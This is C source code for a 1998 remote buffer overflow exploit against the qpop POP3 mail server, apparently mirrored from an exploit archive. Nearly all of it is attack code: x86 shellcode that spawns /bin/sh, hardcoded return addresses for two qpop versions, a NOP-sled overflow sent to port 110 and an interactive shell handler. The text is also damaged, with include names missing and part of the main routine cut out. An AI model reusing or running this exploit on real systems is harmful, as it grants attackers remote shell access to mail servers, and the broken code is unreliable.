/* qpop buffer overflow exploit (pop_msg) * Mon Jun 29 01:26:06 GMT 1998 - herp * Herbert Rosmanith * herp@wildsau.idv.uni-linz.ac.at */ #include #include #include #include #include #include #include #include long addrlist[]={ 0xbfffeee4, /*2.2*/ 0xbfffec2c /*2.41beta1*/ }; char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh........."; void die(char *s) { if (errno) perror(s); else fprintf(stderr,"%s\n",s); exit(-1); } void usage() { printf("qpush [-index] \n" " -0 QPOP Version 2.2 (default)\n" " -1 QPOP Version 2.41beta1\n"); exit(0); } int resolv(char *host,long *ipaddr) { if (isdigit(host[0])) { *ipaddr=inet_addr(host); if (*ipaddr==-1) return -1; } else { struct hostent *hp; if ((hp=gethostbyname(host))==NULL) { fprintf(stderr,"tc: %s: unknown host\n"); exit(-1); } *ipaddr=*(unsigned long *)hp->h_addr; } return 0; } int connect_to(char *hostname,short port) { struct sockaddr_in s_in; int s; s=socket(PF_INET,SOCK_STREAM,0); if (s==-1) die("socket"); if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1) die("unknown host"); s_in.sin_family=AF_INET; s_in.sin_port=htons(port); if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1) die("connect"); return s; } void socket_read(int s,char *buf,int len) { int i; switch(i=read(s,buf,len)) { case -1: die("unexpected EOF"); case 0: die("EOF"); default: buf[i]=0; //printf("%s",buf); break; } } void terminal(int s) { char buf[1024]; fd_set rfds; fd_set fds; int i; for (i=0;i=2 && argv[1][0]=='-') { ix=atoi(&argv[1][1]); argc--; argv++; } else ix=0; if (argc!=2 || ix>sizeof(addrlist)/sizeof(long)) usage(); s=connect_to(argv[1],110); /* WKS POP3 */ socket_read(s,buf,sizeof(buf)); memset(buf,0x90,sizeof(buf)); for (i=981;i<981+10*4;i+=4) memcpy(&buf[i],&addrlist[ix],4); memcpy(&buf[941],shellcode,strlen(shellcode)); buf[sizeof(buf)-3]=0x0d; buf[sizeof(buf)-2]=0x0a; buf[sizeof(buf)-1]=0x00; write(s,buf,sizeof(buf)); socket_read(s,buf,sizeof(buf)); terminal(s); } /* www.hack.co.za [2000]*/